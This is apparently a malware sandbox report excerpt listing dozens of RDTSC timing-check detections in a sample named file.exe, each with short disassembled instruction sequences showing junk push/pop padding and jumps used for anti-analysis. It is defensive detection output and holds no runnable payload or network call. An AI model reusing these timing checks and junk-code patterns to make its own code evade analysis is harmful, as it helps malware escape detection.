            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5CA22 second address: A5CA34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD676Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A606F6 second address: A606FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64087 second address: A64097 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD676Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A64097 second address: A6409C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6409C second address: A640CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007FAD40FD676Ah 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007FAD40FD6768h 0x00000018 pushad 0x00000019 jmp 00007FAD40FD676Eh 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 popad 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A640CD second address: A640D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A683D5 second address: A683FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD6777h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FAD40FD676Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A683FA second address: A68412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAD40FC0C5Dh 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A68412 second address: A68432 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FAD40FD6773h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A68432 second address: A68457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAD40FC0C68h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A68502 second address: 89EEC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FAD40FD676Ch 0x0000000c jns 00007FAD40FD6766h 0x00000012 popad 0x00000013 add dword ptr [esp], 64A0D2C0h 0x0000001a jnc 00007FAD40FD6777h 0x00000020 push dword ptr [ebp+122D1461h] 0x00000026 jmp 00007FAD40FD6772h 0x0000002b call dword ptr [ebp+122D3A2Ch] 0x00000031 pushad 0x00000032 clc 0x00000033 xor eax, eax 0x00000035 jmp 00007FAD40FD676Dh 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e cmc 0x0000003f mov dword ptr [ebp+122D3B1Eh], eax 0x00000045 pushad 0x00000046 mov ecx, dword ptr [ebp+122D3DCAh] 0x0000004c jmp 00007FAD40FD6771h 0x00000051 popad 0x00000052 mov esi, 0000003Ch 0x00000057 mov dword ptr [ebp+122D1E60h], edi 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 jmp 00007FAD40FD6772h 0x00000066 lodsw 0x00000068 jmp 00007FAD40FD676Bh 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 cld 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 pushad 0x00000077 mov dh, ch 0x00000079 add esi, dword ptr [ebp+122D3D46h] 0x0000007f popad 0x00000080 nop 0x00000081 push eax 0x00000082 jbe 00007FAD40FD6777h 0x00000088 jmp 00007FAD40FD6771h 0x0000008d pop eax 0x0000008e push eax 0x0000008f push ebx 0x00000090 pushad 0x00000091 pushad 0x00000092 popad 0x00000093 push eax 0x00000094 push edx 0x00000095 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0511B second address: A0515D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FAD40FC0C56h 0x0000000a jmp 00007FAD40FC0C62h 0x0000000f popad 0x00000010 jmp 00007FAD40FC0C5Fh 0x00000015 jbe 00007FAD40FC0C5Eh 0x0000001b push eax 0x0000001c pop eax 0x0000001d jne 00007FAD40FC0C56h 0x00000023 push eax 0x00000024 push edx 0x00000025 jnl 00007FAD40FC0C56h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0515D second address: A05161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6FBB6 second address: A6FBBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A70018 second address: A7001F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7001F second address: A70025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A70025 second address: A70032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A70032 second address: A70057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD40FC0C62h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jns 00007FAD40FC0C58h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A70057 second address: A7005B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A70478 second address: A70487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAD40FC0C56h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A70487 second address: A70491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAD40FD6766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A70491 second address: A70497 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A70497 second address: A7049D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A086B0 second address: A086D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C64h 0x00000007 jne 00007FAD40FC0C56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A086D2 second address: A086DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FAD40FD6766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A755E2 second address: A755E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A75B90 second address: A75BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD40FD6774h 0x00000009 push eax 0x0000000a jp 00007FAD40FD6766h 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop eax 0x00000013 push edi 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7C33D second address: A7C359 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7C359 second address: A7C361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B76E second address: A4B773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4B773 second address: A4B778 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4C0C7 second address: A4C0DC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAD40FC0C56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jne 00007FAD40FC0C56h 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4C0DC second address: A4C0FA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAD40FD676Ch 0x00000008 jnp 00007FAD40FD6766h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push ecx 0x00000015 pushad 0x00000016 jno 00007FAD40FD6766h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4C0FA second address: A4C13B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 jnp 00007FAD40FC0C6Dh 0x0000000e jmp 00007FAD40FC0C67h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FAD40FC0C66h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4C13B second address: A4C140 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A4C1B1 second address: A4C1CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD40FC0C69h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A27F64 second address: A27F6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A27F6E second address: A27F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FAD40FC0C56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A27F78 second address: A27F82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A27F82 second address: A27F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A27F86 second address: A27F8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7CBFD second address: A7CC02 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7D064 second address: A7D068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7D068 second address: A7D06E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7D06E second address: A7D08D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD6775h 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FAD40FD6766h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7D08D second address: A7D093 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A81876 second address: A8187B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A81DDA second address: A81DE4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAD40FC0C56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A821F6 second address: A821FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A821FA second address: A82204 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAD40FC0C5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A82204 second address: A8220B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A824FB second address: A82510 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FAD40FC0C5Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A82510 second address: A82514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A82673 second address: A826AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FAD40FC0C56h 0x0000000a jmp 00007FAD40FC0C65h 0x0000000f popad 0x00000010 jmp 00007FAD40FC0C64h 0x00000015 pushad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A826AD second address: A826D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007FAD40FD676Ah 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FAD40FD6777h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8140D second address: A81412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A00053 second address: A00057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A00057 second address: A0006F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAD40FC0C5Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0006F second address: A0007D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAD40FD6766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0007D second address: A00081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A00081 second address: A000A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FAD40FD6766h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAD40FD6777h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8A310 second address: A8A316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8A316 second address: A8A31A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8A31A second address: A8A32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FAD40FC0C56h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8A32A second address: A8A32E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8D468 second address: A8D47F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAD40FC0C56h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAD40FC0C5Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8CD40 second address: A8CD52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jbe 00007FAD40FD676Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8D044 second address: A8D070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnp 00007FAD40FC0C56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007FAD40FC0C62h 0x00000012 popad 0x00000013 pushad 0x00000014 jc 00007FAD40FC0C58h 0x0000001a push eax 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8D070 second address: A8D074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A92029 second address: A92045 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A92045 second address: A9204B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9204B second address: A92057 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 je 00007FAD40FC0C56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A92188 second address: A92192 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAD40FD6766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A92345 second address: A92366 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAD40FC0C67h 0x00000008 jmp 00007FAD40FC0C61h 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007FAD40FC0C56h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A933C0 second address: A933D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FAD40FD6770h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A97352 second address: A9735D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FAD40FC0C56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9735D second address: A973AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD40FD676Eh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FAD40FD6777h 0x00000010 jng 00007FAD40FD6766h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jnl 00007FAD40FD6766h 0x00000022 push edx 0x00000023 pop edx 0x00000024 pushad 0x00000025 popad 0x00000026 push edi 0x00000027 pop edi 0x00000028 popad 0x00000029 jnl 00007FAD40FD676Eh 0x0000002f push edx 0x00000030 pop edx 0x00000031 js 00007FAD40FD6766h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A973AF second address: A973B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A97533 second address: A97550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FD676Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A976C1 second address: A976CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FAD40FC0C56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9A455 second address: A9A45F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FAD40FD6766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9A45F second address: A9A463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9A463 second address: A9A469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9A469 second address: A9A480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 js 00007FAD40FC0C66h 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 js 00007FAD40FC0C56h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9A605 second address: A9A60B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9FDBC second address: A9FDC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA0021 second address: AA0025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA06CD second address: AA06D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA0D1B second address: AA0D23 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA0D23 second address: AA0D3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C60h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA137C second address: AA1380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA1380 second address: AA1388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA1388 second address: AA138E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA138E second address: AA13AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD40FC0C66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA1675 second address: AA1679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
